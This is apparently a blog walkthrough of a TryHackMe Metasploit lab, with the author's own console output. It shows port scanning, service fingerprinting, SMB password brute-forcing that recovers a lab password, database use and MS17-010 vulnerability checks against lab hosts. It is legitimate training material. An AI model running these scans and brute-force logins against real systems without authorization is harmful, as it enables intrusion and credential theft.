Skip to main content
HashnodeCyberWithSharon

Command Palette

Search for a command to run...

Metasploit: Scanning and Exploitation (TryHackMe)

Updated
37 min read
Metasploit: Scanning and Exploitation (TryHackMe)
J
Jebitok
Software Developer | Learning Cybersecurity | Open for roles * If you're in the early stages of your career in software development (student or still looking for an entry-level role) and in need of mentorship, you can reach out to me.

Link to the Walkthrough/Challenge on TryHackMe: Metasploit: Scanning and Exploitation

Introduction

In the previous room, you learned how to navigate the Metasploit Framework: searching for modules, configuring parameters, launching exploits, and managing sessions. Those are the mechanics. In this room, you put them to work.

Stratford Systems has given your team the green light to proceed with active testing against their internal network. Your scope includes a small subnet containing a Windows workstation and a Linux server, both running production services. Your objectives are straightforward: identify what is running on each host, determine which services are vulnerable, exploit those vulnerabilities to gain access, and document your findings.

Learning Objectives

  • Scan target systems using Metasploit's built-in port scanning and service enumeration modules

  • Store and manage results using the Metasploit database, including workspaces, host tracking, and credential storage

  • Identify vulnerabilities by running targeted scanner modules against discovered services

  • Exploit vulnerable services on two different target systems using two distinct exploit types, demonstrating that the Metasploit workflow generalizes across protocols, operating systems, and vulnerability classes

Prerequisites

This room builds directly on Metasploit: The Basics. You should be comfortable with:

  • Launching msfconsole and using search, use, info, and back

  • Setting module parameters with set, setg, and show options

  • Running modules with exploit/run and managing sessions with background, sessions, and sessions -i

Scanning with Metasploit

You have two lab machines on the Stratford Systems network and no information beyond their IP addresses. Before you can exploit anything, you need to know what is running on each host: which ports are open, what services are listening, and what versions those services are running. This is where scanning begins.

You might be wondering: why scan with Metasploit when you already know how to use Nmap? The short answer is database integration. When you scan from within msfconsole, the results can flow directly into the Metasploit database (which we will set up in the next task), making them instantly available to other modules. You can also run Nmap directly from the msfconsole prompt, giving you the best of both worlds.

Port Scanning with Metasploit Modules

Metasploit includes several port scanning modules under auxiliary/scanner/portscan/. You can list them with search portscan:

msf6 > search portscan

Matching Modules
================

   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/portscan/ftpbounce              .                normal  No     FTP Bounce Port Scanner
   1  auxiliary/scanner/natpmp/natpmp_portscan          .                normal  No     NAT-PMP External Port Scanner
   2  auxiliary/scanner/sap/sap_router_portscanner      .                normal  No     SAPRouter Port Scanner
   3  auxiliary/scanner/portscan/xmas                   .                normal  No     TCP "XMas" Port Scanner
   4  auxiliary/scanner/portscan/ack                    .                normal  No     TCP ACK Firewall Scanner
   5  auxiliary/scanner/portscan/tcp                    .                normal  No     TCP Port Scanner
   6  auxiliary/scanner/portscan/syn                    .                normal  No     TCP SYN Port Scanner
   7  auxiliary/scanner/http/wordpress_pingback_access  .                normal  No     Wordpress Pingback Locator
msf6 >

The most commonly used is auxiliary/scanner/portscan/tcp, which performs a full TCP connect scan. Let's load it and look at its options:

Attack Box

msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

 Name         Current Setting  Required  Description
 ----         ---------------  --------  -----------
 CONCURRENCY  10               yes       The number of concurrent ports to check per host
 DELAY        0                yes       The delay between connections, per thread, in milliseconds
 JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
 PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
 RHOSTS                        yes       The target host(s), [...]
 THREADS      1                yes       The number of concurrent threads (max one per host)
 TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf6 auxiliary(scanner/portscan/tcp) >

A few things to note about these options:

  • PORTS: The default range is 1-10000. This is not the same as Nmap's default, which scans the 1,000 most commonly used ports. Metasploit scans every port in the specified range sequentially. For a quick scan, you might narrow this to 1-1024 or specify individual ports of interest.

  • THREADS: Increasing this value speeds up the scan by running multiple connection attempts in parallel. A value of 10 is reasonable for most lab environments.

  • CONCURRENCY: Controls how many ports are checked simultaneously per host. This works alongside THREADS to determine overall scan speed.

Let's scan the Stratford Windows workstation:

msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS MACHINE_IP
RHOSTS => MACHINE_IP
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 1-1024,3389,8000-8100
PORTS => 1-1024,3389,8000-8100
msf6 auxiliary(scanner/portscan/tcp) > set THREADS 10
THREADS => 10
msf6 auxiliary(scanner/portscan/tcp) > run

[+] MACHINE_IP          - MACHINE_IP:135 - TCP OPEN
[+] MACHINE_IP          - MACHINE_IP:139 - TCP OPEN
[+] MACHINE_IP          - MACHINE_IP:445 - TCP OPEN
[+] MACHINE_IP          - MACHINE_IP:3389 - TCP OPEN
[+] MACHINE_IP          - MACHINE_IP:8000 - TCP OPEN
[*] MACHINE_IP          - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/portscan/tcp) >

This gives us version information that the basic port scanner could not provide. We can now see that port 445 is SMB on a Windows system in the STRATFORD workgroup, and port 8000 is running webfs/1.21.

Note: The key difference between running nmap and using db_nmap (which we will cover in the next task) is that nmap results are displayed but not stored in the Metasploit database. If you want scan results to be automatically stored and queryable, use db_nmap instead.

Service-Specific Scanners

Metasploit's auxiliary modules include scanners designed for specific protocols. These go beyond port discovery and provide targeted enumeration. Let's use a few against our Stratford target.

NetBIOS Name Scanner

The auxiliary/scanner/netbios/nbname module queries the NetBIOS name service to identify hostnames and domain membership:

msf6 > use auxiliary/scanner/netbios/nbname
msf6 auxiliary(scanner/netbios/nbname) > set RHOSTS MACHINE_IP
RHOSTS => MACHINE_IP
msf6 auxiliary(scanner/netbios/nbname) > run

[*] Sending NetBIOS requests to MACHINE_IP->MACHINE_IP (1 hosts)
[+] 10.80.137.252 [STRATFORD-WS01] OS:Windows Names:(STRATFORD-WS01)  Mac:00:50:56:ab:cd:ef Lab Machine:VMWare[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/netbios/nbname) >

This confirms the machine's NetBIOS name is STRATFORD-WS01.

HTTP Version Scanner

The auxiliary/scanner/http/http_version module fingerprints web servers:

Attack Box

msf6 > use auxiliary/scanner/http/http_version
msf6 auxiliary(scanner/http/http_version) > set RHOSTS MACHINE_IP
RHOSTS => MACHINE_IP
msf6 auxiliary(scanner/http/http_version) > set RPORT 8000
RPORT => 8000
msf6 auxiliary(scanner/http/http_version) > run

[+] MACHINE_IP:8000 webfs/1.21
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/http_version) >

Port 8000 is running webfs/1.21, a lightweight HTTP file server. This is a useful data point for later vulnerability research.

SMB Login Brute-Force

Note: Brute-forcing with large wordlists may take a considerable amount of time. You should generally target specific/confirmed users.

The auxiliary/scanner/smb/smb_login module attempts to authenticate against the SMB service using a wordlist. This is how you test for weak credentials:

msf6 > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > set RHOSTS MACHINE_IP
RHOSTS => MACHINE_IP
msf6 auxiliary(scanner/smb/smb_login) > set SMBUSER penny
msf6 auxiliary(scanner/smb/smb_login) > set PASS_FILE /usr/share/wordlists/MetasploitRoom/MetasploitWordlist.txt
PASS_FILE => /usr/share/wordlists/MetasploitRoom/MetasploitWordlist.txt
msf6 auxiliary(scanner/smb/smb_login) > set VERBOSE false
VERBOSE => false
msf6 auxiliary(scanner/smb/smb_login) > run

[+] MACHINE_IP:445       - MACHINE_IP:445 - Success: '.\penny:REDACTED'
[*] MACHINE_IP:445       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) >

The scanner found valid credentials: the user penny has the password leo1234. This is exactly the kind of "low-hanging fruit" that scanning uncovers. In a real engagement, weak credentials like this are disturbingly common and often provide the fastest path to initial access.

Choosing the Right Scanner

Metasploit contains hundreds of auxiliary scanner modules. You do not need to memorize them. The pattern is always the same:

  1. Identify an open port and service from your scan results

  2. Use search type:auxiliary <service_name> to find relevant scanner modules

  3. Use info to understand what the module does

  4. Set parameters and run

For example, if you found an FTP service on port 21, you might search for search type:auxiliary ftp and discover modules for anonymous login testing, version detection, and brute-force authentication. The discovery process is the skill; the specific modules are reference material.

Answer the questions below

msfconsole
search portscan
use 5
show options 
set RHOSTS 10.113.179.218
set PORTS 1-1024,3389,8000-8100
set THREADS 10
run 
nmap -sV -O 10.113.179.218

How many open ports did the scan discover on the Stratford Windows workstation? 5

msfconsole


   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/portscan/ftpbounce              .                normal  No     FTP Bounce Port Scanner
   1  auxiliary/scanner/natpmp/natpmp_portscan          .                normal  No     NAT-PMP External Port Scanner
   2  auxiliary/scanner/sap/sap_router_portscanner      .                normal  No     SAPRouter Port Scanner
   3  auxiliary/scanner/portscan/xmas                   .                normal  No     TCP "XMas" Port Scanner
   4  auxiliary/scanner/portscan/ack                    .                normal  No     TCP ACK Firewall Scanner
   5  auxiliary/scanner/portscan/tcp                    .                normal  No     TCP Port Scanner
   6  auxiliary/scanner/portscan/syn                    .                normal  No     TCP SYN Port Scanner
   7  auxiliary/scanner/http/wordpress_pingback_access  .                normal  No     Wordpress Pingback Locator


Interact with a module by name or index. For example info 7, use 7 or use auxiliary/scanner/http/wordpress_pingback_access

msf > use 5
msf auxiliary(scanner/portscan/tcp) > show options 

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent por
                                           ts to check per host
   DELAY        0                yes       The delay between connection
                                           s, per thread, in millisecon
                                           ds
   JITTER       0                yes       The delay jitter factor (max
                                           imum value by which to +/- D
                                           ELAY) in milliseconds.
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80
                                           ,110-900)
   RHOSTS                        yes       The target host(s), see http
                                           s://docs.metasploit.com/docs
                                           /using-metasploit/basics/usi
                                           ng-metasploit.html
   THREADS      1                yes       The number of concurrent thr
                                           eads (max one per host)
   TIMEOUT      1000             yes       The socket connect timeout i
                                           n milliseconds


View the full module info with the info, or info -d command.

msf auxiliary(scanner/portscan/tcp) > set RHOSTS 10.113.179.218
RHOSTS => 10.113.179.218
msf auxiliary(scanner/portscan/tcp) > set PORTS 1-1024,3389,8000-8100
PORTS => 1-1024,3389,8000-8100
msf auxiliary(scanner/portscan/tcp) > set THREADS 10
THREADS => 10
msf auxiliary(scanner/portscan/tcp) > run
[+] 10.113.179.218        - 10.113.179.218:135 - TCP OPEN
[+] 10.113.179.218        - 10.113.179.218:139 - TCP OPEN
[+] 10.113.179.218        - 10.113.179.218:445 - TCP OPEN
[+] 10.113.179.218        - 10.113.179.218:3389 - TCP OPEN
[+] 10.113.179.218        - 10.113.179.218:8000 - TCP OPEN
[*] 10.113.179.218        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/portscan/tcp) > nmap -sV -O 10.113.179.218

135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  tcpwrapped
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
8000/tcp open  http-alt      webfs/1.21

msf auxiliary(scanner/portscan/tcp) > back 
msf > use auxiliary/scanner/netbios/nbname
msf auxiliary(scanner/netbios/nbname) > set RHOSTS 10.113.179.218
RHOSTS => 10.113.179.218

Using the NetBIOS scanner, what is the NetBIOS name of the target? STRATFORD-WS01

msf auxiliary(scanner/netbios/nbname) > run
[*] Sending NetBIOS requests to 10.113.179.218->10.113.179.218 (1 hosts)

[+] 10.113.179.218 [STRATFORD-WS01] OS:Windows Names:(STRATFORD-WS01)  Mac:00:50:56:ab:cd:ef Virtual Machine:VMWare
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

set PASS_FILE /usr/share/wordlists/MetasploitRoom/MetasploitWordlist.txt
PASS_FILE => /usr/share/wordlists/MetasploitRoom/MetasploitWordlist.txt

What service is running on port 8000? webfs/1.21

msf auxiliary(scanner/portscan/tcp) > nmap -sV -O 10.113.179.218

135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  tcpwrapped
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
8000/tcp open  http-alt      webfs/1.21

Using the SMB login scanner and the provided wordlist, what is the penny user's password? Spring2013

msf auxiliary(scanner/smb/smb_login) > set VERBOSE false
VERBOSE => false
msf auxiliary(scanner/smb/smb_login) > run
[+] 10.113.179.218:445    - 10.113.179.218:445    - Success: '.\penny:Spring2013'
[*] 10.113.179.218:445    - Scanned 1 of 1 hosts (100% complete)
[*] 10.113.179.218:445    - Bruteforce completed, 1 credential was successful.
[*] 10.113.179.218:445    - You can open an SMB session with these credentials and CreateSession set to true
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/smb_login) >

The Metasploit Database

You have just scanned STRATFORD-WS01 and discovered 5 open ports. Now imagine a real engagement where your scope includes fifty hosts, each with a handful of open services. Are you going to remember which ports were open on each one? Are you going to retype IP addresses every time you switch modules?

Metasploit solves this problem with a built-in database backed by PostgreSQL. The database stores hosts, services, credentials, and vulnerability data from your scans, and makes all of it queryable from within msfconsole. Instead of manually tracking results in notes or spreadsheets, you can let the framework manage your engagement data for you.

Setting Up the Database

On the TryHackMe AttackBox, the Metasploit database is already configured and ready to use. If you are working on your own Kali Linux installation, you will need to initialize it first.

On Kali Linux, the setup requires two steps:

AttackBox Terminal

┌──(kali㉿kali)-[~]
└─$ sudo msfdb init
[i] Database already started
[i] Creating database user 'msf'
[i] Creating databases 'msf' and 'msf_test'
[i] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
[i] Creating initial database schema

Then launch msfconsole and verify the connection:

AttackBox Terminal

msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
msf6 >

If you see Connected to msf, the database is ready. If you see No connection, the PostgreSQL service may not be running. Start it with sudo systemctl start postgresql, then try sudo msfdb init again.

Important: On Kali Linux, the correct command is sudo msfdb init. You may encounter older tutorials that recommend sudo -u postgres msfdb init, which is the upstream (non-Kali) approach. Kali ships its own version of the msfdb script that handles PostgreSQL user creation internally and expects to be run with sudo.

Workspaces

Workspaces let you isolate data from different engagements. All scan results, hosts, services, and credentials are scoped to the current workspace. When you first launch msfconsole with a database, you are in the default workspace:

AttackBox Terminal

msf6 > workspace

msf6 >

The * indicates the active workspace. Let's create a workspace for our Stratford Systems engagement and switch to it:

AttackBox Terminal

msf6 > workspace -a stratford
[*] Added workspace: stratford
[*] Workspace: stratford
msf6 > workspace
 default
* stratford
msf6 >

From this point forward, every scan result and credential we collect will be stored under the stratford workspace. If you later start a different engagement, you can create a new workspace for it without mixing data.

To switch between workspaces, type workspace followed by the name:

AttackBox Terminal

msf6 > workspace default
[*] Workspace: default
msf6 > workspace stratford
[*] Workspace: stratford
msf6 >

To delete a workspace (and all its data), use workspace -d <name>.

Scanning Into the Database With db_nmap

The db_nmap command is one of the most valuable features of the database integration. It runs Nmap with whatever flags you specify, but instead of just printing results to the screen, it automatically stores everything in the database: hosts, ports, service names, versions, and OS detection data.

Let's scan the Stratford target:

msf6 > db_nmap -sV -O MACHINE_IP
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2026-05-14 07:30 BST
[*] Nmap: Nmap scan report for MACHINE_IP
[*] Nmap: Host is up (0.0012s latency).
[*] Nmap: Not shown: 995 closed ports
[*] Nmap: PORT     STATE SERVICE      VERSION
[*] Nmap: 135/tcp  open  msrpc         Microsoft Windows RPC
[*] Nmap: 139/tcp  open  tcpwrapped
[*] Nmap: 445/tcp  open  microsoft-ds?
[*] Nmap: 3389/tcp open  ms-wbt-server Microsoft Terminal Services
[*] Nmap: 8000/tcp open  http-alt      webfs/1.21

msf6 >

The host is now stored in the database. Let's query what we found.

Querying the Database: Hosts, Services, and Credentials

hosts

The hosts command lists every host the database knows about:

AttackBox Terminal

msf6 > hosts

Hosts
=====

address        mac  name  os_name           os_flavor  os_sp  purpose  info  comments
-------        ---  ----  -------           ---------  -----  -------  ----  --------
MACHINE_IP              Windows Longhorn                    device

msf6 >

services

The services command lists every open port and its associated service across all hosts in the current workspace:

msf6 > services

Services
========

host            port   proto  name          state  info
----            ----   -----  ----          -----  ----
MACHINE_IP       135   tcp    msrpc          open   Microsoft Windows RPC
MACHINE_IP       139   tcp    tcpwrapped     open
MACHINE_IP       445   tcp    microsoft-ds   open
MACHINE_IP       3389  tcp    ms-wbt-server  open   Microsoft Terminal Services
MACHINE_IP       8000  tcp    http-alt       open   webfs/1.21


msf6 >

You can filter services with the -S flag. For example, to find only webfs services across all scanned hosts:

AttackBox Terminal

msf6 > services -S webfs
Services
========

host           port  proto  name      state  info
----           ----  -----  ----      -----  ----
10.80.137.252  8000  tcp    http-alt  open   webfs/1.21

msf6 >

creds

The creds command displays any credentials that Metasploit has collected during the engagement. Remember the SMB brute-force we ran in the previous task? If the database was active during that scan, the successful login was stored automatically:

AttackBox Terminal

msf6 > creds

Credentials
===========

host            origin          service          public  private   realm  private_type
----            ------          -------          ------  -------   -----  ------------
MACHINE_IP      MACHINE_IP      445/tcp (smb)    penny   leo1234          Password

msf6 >

The penny:leo1234 credential is now available for any module that needs authentication. This is one of the major advantages of database integration: information collected by one module is automatically available to every other module.

Using Database Hosts as RHOSTS

One of the most practical database features is the hosts -R command, which takes every host in the database and automatically populates the RHOSTS parameter of the current module:

msf6 > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > hosts -r

Hosts
=====

address      mac  name  os_name       os_flavor  os_sp  purpose  info  comments
-------      ---  ----  -------       ---------  -----  -------  ----  --------
MACHINE_IP             Windows 2012                    server


msf6 auxiliary(scanner/smb/smb_login) > show options

Module options (scanner/smb/smb_login):

 Name         Current Setting              Required  Description
 ----         ---------------              --------  -----------
 RHOSTS       MACHINE_IP                   yes       The target host(s), [...]
 [...]

No manual IP entry required. With dozens of targets, this saves significant time and eliminates transcription errors. You can also use services -R to populate RHOSTS from a specific service filter (e.g., services -S smb -R to target only hosts with SMB).

Importing External Scan Results

If you ran Nmap outside of msfconsole and saved the results to an XML file, you can import them with db_import:

msf6 > db_import /path/to/nmap_scan.xml
[*] Importing 'Nmap XML' data
[*] Import: Parsing with 'Nokogiri v1.15.5'
[*] Importing host MACHINE_IP
[*] Successfully imported /path/to/nmap_scan.xml
msf6 >

This supports Nmap XML format, as well as output from several other tools (Nessus, Qualys, Burp Suite, etc.). The db_export command lets you export your database contents for reporting or archival purposes.

Answer the questions below

What command do you use to check if the Metasploit database is connected?db_status

What command creates a new workspace called "stratford"? workspace -a stratford

What command runs an Nmap scan and automatically stores the results in the Metasploit database? db_nmap

You are about to run an auxiliary module and want to automatically set RHOSTS to every host in the database. What command do you use? hosts -R

Vulnerability Scanning

You have open ports, service names, and version numbers stored in your database. Now the question becomes: which of these services have known, exploitable vulnerabilities? This is the step that bridges scanning and exploitation.

In penetration testing, the term low-hanging fruit refers to vulnerabilities that are easy to identify and straightforward to exploit. These are often the fastest path to initial access: unpatched services, default credentials, misconfigurations, and known backdoors. Metasploit's auxiliary scanner modules are designed to check for exactly these kinds of issues.

The Approach: Service Versions Drive Module Selection

The key to effective vulnerability scanning with Metasploit is connecting the service information you have already collected to the right scanner modules. Consider what db_nmap revealed about the Stratford Systems network:

  • Port 445 on STRATFORD-WS01: Microsoft Windows Server 2008

  • Port 21 on stratford-srv01: vsftpd 2.3.4

  • Port 22 on stratford-srv01: OpenSSH 8.2p1

Each of these version strings is a search query waiting to happen. If a service version has a known vulnerability, there is a good chance Metasploit has a scanner module to test for it.

Example 1: Checking for MS17-010 (EternalBlue)

Info: You can follow along using the Machine in Task 5.

The SMB service on STRATFORD-WS01 is running on a Windows Server 2008 host. One of the most critical SMB vulnerabilities in Windows Server 2008 is MS17-010, the flaw exploited by EternalBlue. Metasploit includes a dedicated scanner to check for it:

msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS MACHINE_IP
RHOSTS => MACHINE_IP
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] MACHINE_IP:445       - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (64-bit)
[*] MACHINE_IP:445       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) >

The [+] prefix and "Host is likely VULNERABLE" message confirm the finding. This host is missing the MS17-010 patch and is a strong candidate for exploitation.

After running this scanner, check the vulns command:

msf6 > vulns

Vulnerabilities
===============

Timestamp                Host            Name                                    References
---------                ----            ----                                    ----------
2026-03-18 15:22:10 UTC  MACHINE_IP      MS17-010 SMB RCE Detection              CVE-2017-0143,CVE-2017-0144,CVE-2017-0145,[...]

msf6 >

The vulnerability has been automatically recorded in the database, complete with CVE references. This is the kind of structured data that makes reporting easier at the end of an engagement.

Example 2: Checking for Anonymous FTP Access

Info: You can follow along using the Machine in Task 6.

The Linux server (stratford-srv01) is running vsftpd 2.3.4 on port 21. Before we look for exploits, a quick check for anonymous access is worthwhile:

msf6 > use auxiliary/scanner/ftp/anonymous
msf6 auxiliary(scanner/ftp/anonymous) > services -S ftp -R
RHOSTS => MACHINE_IP
msf6 auxiliary(scanner/ftp/anonymous) > run

[*] MACHINE_IP:21        - MACHINE_IP:21 - Banner: 220 (vsFTPd 2.3.4)
[-] MACHINE_IP:21        - MACHINE_IP:21 - Login failed: anonymous:mozilla@example.com
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ftp/anonymous) >

Anonymous login failed, which is actually a good security practice. But notice two things in this example: first, we used services -S ftp -R to automatically populate RHOSTS with only the hosts that have an FTP service, pulling the data directly from the database. Second, the banner confirms vsFTPd 2.3.4. That specific version has a well-known backdoor vulnerability, which we will exploit in the next task.

The Vulnerability Scanning Pattern

Across both examples, the workflow follows the same pattern:

  1. Review service versions from your db_nmap results (using services or services -S)

  2. Search for relevant scanner modules (search type:auxiliary <service_or_cve>)

  3. Load the module, set RHOSTS (manually or via hosts -R / services -R), and run

  4. Check vulns to see what was recorded

The goal is not to run every scanner module in Metasploit. The goal is to make targeted, informed checks based on what you already know about the target environment. A version string like vsftpd 2.3.4 or Microsoft Windows Server 2008 immediately narrows your search space to a handful of relevant modules.

You have completed the reconnaissance cycle: port scanning, service enumeration, and vulnerability identification. The Stratford Systems network has two confirmed findings. STRATFORD-WS01 is vulnerable to MS17-010 (EternalBlue) on its SMB service. The Linux server, stratford-srv01, is running vsftpd 2.3.4 on port 21, a version with a well-documented backdoor. It is time to move from identifying vulnerabilities to exploiting them.

In the next tasks, we will exploit both targets using two fundamentally different exploits. The workflow is the same in both cases, but the exploits differ in protocol, target OS, vulnerability type, and session type. This is deliberate: the goal is to demonstrate that Metasploit's operational pattern, search → configure → exploit → interact, works regardless of the underlying technical details.

Answer the questions below

What auxiliary module checks if a target is vulnerable to MS17-010? auxiliary/scanner/smb/smb_ms17_010

msf > search type:auxiliary smb

Matching Modules
================

   #   Name                                                            Disclosure Date  Rank    Check  Description
   -   ----                                                            ---------------  ----    -----  -----------
   0   auxiliary/server/capture/smb                                    .                normal  No     Authentication Capture: SMB
   1   auxiliary/scanner/http/citrix_dir_traversal                     2019-12-17       normal  No     Citrix ADC (NetScaler) Directory Traversal Scanner
   2   auxiliary/gather/crushftp_fileread_cve_2024_4040                .                normal  Yes    CrushFTP Unauthenticated Arbitrary File Read
   3   auxiliary/scanner/smb/impacket/dcomexec                         2018-03-19       normal  No     DCOM Exec
   4   auxiliary/scanner/smb/impacket/secretsdump                      .                normal  No     DCOM Exec
   5   auxiliary/scanner/dcerpc/dfscoerce                              .                normal  No     DFSCoerce
   6   auxiliary/server/relay/esc8                                     .                normal  Yes    ESC8 Relay: SMB to HTTP(S)
   7   auxiliary/server/http_ntlmrelay                                 .                normal  No     HTTP Client MS Credential Relayer
   8   auxiliary/fileformat/icon_environment_datablock_leak            2025-05-16       normal  No     IconEnvironmentDataBlock - Windows LNK File Special UNC Path NTLM Leak
   9   auxiliary/gather/konica_minolta_pwd_extract                     .                normal  No     Konica Minolta Password Extractor
   10  auxiliary/fileformat/odt_badodt                                 2018-05-01       normal  No     LibreOffice 6.03 /Apache OpenOffice 4.1.5 Malicious ODT File Generator
   11  auxiliary/admin/smb/ms17_010_command                            2017-03-14       normal  No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   12    \_ AKA: ETERNALSYNERGY                                        .                .       .      .
   13    \_ AKA: ETERNALROMANCE                                        .                .       .      .
   14    \_ AKA: ETERNALCHAMPION                                       .                .       .      .
   15    \_ AKA: ETERNALBLUE                                           .                .       .      .
   16  auxiliary/scanner/smb/smb_ms17_010                              .                normal  Yes    MS17-010 SMB RCE Detection
   17    \_ AKA: DOUBLEPULSAR                                          .                .       .      .
   18    \_ AKA: ETERNALBLUE                                           .                .       .      .
   19  auxiliary/dos/windows/smb/ms05_047_pnp                          .                normal  No     Microsoft Plug and Play Service Registry Overflow
   20  auxiliary/dos/windows/smb/rras_vls_null_deref                   2006-06-14       normal  No     Microsoft RRAS InterfaceAdjustVLSPointers NULL Dereference
   21  auxiliary/admin/mssql/mssql_ntlm_stealer                        .                normal  No     Microsoft SQL Server NTLM Stealer
   22  auxiliary/admin/mssql/mssql_ntlm_stealer_sqli                   .                normal  No     Microsoft SQL Server SQLi NTLM Stealer
   23  auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli           .                normal  No     Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration
   24  auxiliary/admin/mssql/mssql_enum_domain_accounts                .                normal  No     Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration
   25  auxiliary/dos/windows/smb/ms06_035_mailslot                     2006-07-11       normal  No     Microsoft SRV.SYS Mailslot Write Corruption
   26  auxiliary/dos/windows/smb/ms06_063_trans                        .                normal  No     Microsoft SRV.SYS Pipe Transaction No Null
   27  auxiliary/dos/windows/smb/ms09_001_write                        .                normal  No     Microsoft SRV.SYS WriteAndX Invalid DataOffset
   28  auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh       .                normal  No     Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
   29  auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff          .                normal  No     Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference
   30  auxiliary/dos/windows/smb/vista_negotiate_stop                  .                normal  No     Microsoft Vista SP0 SMB Negotiate Protocol DoS
   31  auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop      .                normal  No     Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop
   32  auxiliary/scanner/smb/psexec_loggedin_users                     .                normal  No     Microsoft Windows Authenticated Logged In Users Enumeration
   33  auxiliary/dos/windows/smb/ms11_019_electbowser                  .                normal  No     Microsoft Windows Browser Pool DoS
   34  auxiliary/server/relay/smb_to_ldap                              .                normal  No     Microsoft Windows SMB to LDAP Relay
   35  auxiliary/server/relay/smb_to_mssql                             .                normal  No     Microsoft Windows SMB to MSSQL Relay
   36  auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow        .                normal  No     Microsoft Windows SRV.SYS SrvSmbQueryFsInformation Pool Overflow DoS
   37  auxiliary/fileformat/word_unc_injector                          .                normal  No     Microsoft Word UNC Path Injector
   38  auxiliary/spoof/nbns/nbns_response                              .                normal  No     NetBIOS Name Service Spoofer
   39  auxiliary/admin/oracle/ora_ntlm_stealer                         2009-04-07       normal  No     Oracle SMB Relay Code Execution
   40  auxiliary/scanner/dcerpc/petitpotam                             .                normal  No     PetitPotam
   41  auxiliary/admin/smb/psexec_ntdsgrab                             .                normal  No     PsExec NTDS.dit And SYSTEM Hive Download Utility
   42  auxiliary/fileformat/environment_variable_datablock_leak        2025-05-06       normal  No     Right-Click Execution - Windows LNK File Special UNC Path NTLM Leak
   43  auxiliary/scanner/sap/sap_smb_relay                             .                normal  No     SAP SMB Relay Abuse
   44  auxiliary/dos/sap/sap_soap_rfc_eps_delete_file                  .                normal  No     SAP SOAP EPS_DELETE_FILE File Deletion
   45  auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing    .                normal  No     SAP SOAP RFC EPS_GET_DIRECTORY_LISTING Directories Information Disclosure
   46  auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence  .                normal  No     SAP SOAP RFC PFL_CHECK_OS_FILE_EXISTENCE File Existence Check
   47  auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir                 .                normal  No     SAP SOAP RFC RZL_READ_DIR_LOCAL Directory Contents Listing
   48  auxiliary/fuzzers/smb/smb_create_pipe_corrupt                   .                normal  No     SMB Create Pipe Request Corruption
   49  auxiliary/fuzzers/smb/smb_create_pipe                           .                normal  No     SMB Create Pipe Request Fuzzer
   50  auxiliary/admin/smb/list_directory                              .                normal  No     SMB Directory Listing Utility
   51  auxiliary/scanner/smb/smb_enumusers_domain                      .                normal  No     SMB Domain User Enumeration
   52  auxiliary/admin/smb/delete_file                                 .                normal  No     SMB File Delete Utility
   53  auxiliary/admin/smb/download_file                               .                normal  No     SMB File Download Utility
   54  auxiliary/admin/smb/upload_file                                 .                normal  No     SMB File Upload Utility
   55  auxiliary/scanner/smb/smb_enum_gpp                              .                normal  No     SMB Group Policy Preference Saved Passwords Enumeration
   56  auxiliary/scanner/smb/smb_login                                 .                normal  No     SMB Login Check Scanner
   57  auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt                   .                normal  No     SMB NTLMv1 Login Request Corruption
